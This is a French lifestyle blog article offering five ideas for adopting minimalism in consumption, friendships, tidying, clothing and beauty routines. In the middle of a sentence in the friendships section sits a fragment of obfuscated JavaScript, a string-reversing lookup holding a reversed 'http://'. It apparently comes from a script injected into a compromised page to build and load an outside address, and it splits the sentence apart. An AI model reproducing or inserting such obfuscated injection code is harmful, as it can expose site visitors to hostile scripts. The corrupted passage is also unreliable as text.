5 idées à adopter de la tendance minimaliste

En réalité bien plus qu’une tendance, le minimalisme représente une véritable philosophie de vie. Toutefois, il ne s’agit pas d’un unique courant de pensée car de nombreux domaines de créations sont influencés par celui-ci. Retrouvez 5 idées à adopter dans votre style de vie pour vivre mieux mais avec moins !

adopter le minimalisme

Qu’est ce que le minimalisme ?

Le minimalisme peut s’appliquer aux objets mais pas seulement. En effet, il est tout aussi adapté dans des aspects non matériels de nos vies tels que la façon de gérer son temps ou encore ses relations avec les autres. L’objectif est d’avoir une réflexion sur ce qui nous semble être l’essentiel afin de se débarrasser du superflu dans tous les domaines de notre vie.

Le mode de consommation

La publicité nous sollicite constamment afin de nous créer de nouveaux besoins. Pour faire le vide dans sa tête et réaliser que l’on a déjà beaucoup, il faut plutôt d’abord se concentrer sur ce que l’on a déjà plutôt que sur ce qu’il nous manque. Ensuite, pensez aussi à voir votre famille et vos amis pour passer du temps avec eux. Et si le bonheur c’était de cumuler des souvenirs avec les autres plutôt que de cumuler des choses ?

Les relations avec les autres

En ce qui concerne les relations sociales, nous sommes amenés à côtoyer beaucoup de monde. Surtout à l’heure des réseaux sociaux, nous discutons de tout et de rien avec tout le monde. Mais savez-vous qui sont réellement vos amis ? Et, surtout la vraie question c’est est-ce que vous les connaissez suffisamment ? Prenez du temps pour eux, il vaut mieux donner de son temps à deux amis plutôt que de s’éparpiller à vouloir plaire à tout le monde. Vous en serez récompensé sans même vous en rendre compte et cela qu {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}and vous ne vous y attendrez pas.

Le rangement chez soi

Dans l’idée de se recentrer sur l’essentiel, rien de plus efficace que de faire du tri chez soi. On se rend compte qu’il y a beaucoup de choses que l’on accumule mais dont on ne sert plus. Pourquoi alors ne pas les vendre ou les donner pour en faire profiter quelqu’un d’autre ?

Le style vestimentaire

Côté mode, lorsque l’on manque d’inspiration dans le choix d’une tenue, on peut s’inspirer du minimalisme, en se tournant vers des coupes graphiques, structurées et simples. L’idée est aussi de choisir une seule couleur pour un look monochrome. Il faut privilégier des pièces de qualité, jouer sur les superpositions et soigner les détails pour un rendu parfait !

La routine beauté

Dans le domaine du bien-être, less is more est un adage qui ne perd pas une ride. Que l’on parle de la routine de soin ou bien du choix de maquillage, mieux vaut en mettre moins que trop. En premier point, c’est la qualité des produits qui priment. On va préférer des compositions naturelles ou bio. Ensuite, l’avantage c’est que les propriétés des produits simples et naturels permettent une utilisation variée. Une huile végétale peut servir pour le démaquillage, pour nourrir la peau et aussi les cheveux.

Nous laissons le mot de la fin à Antoine de Saint-Exupéry : “La perfection est atteinte, non pas lorsqu’il n’y a plus rien à ajouter, mais lorsqu’il n’y a plus rien à retirer.” Dites nous dans quel domaine de votre vie, vous appliquez les principes du minimalisme !

Articles recommandés

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *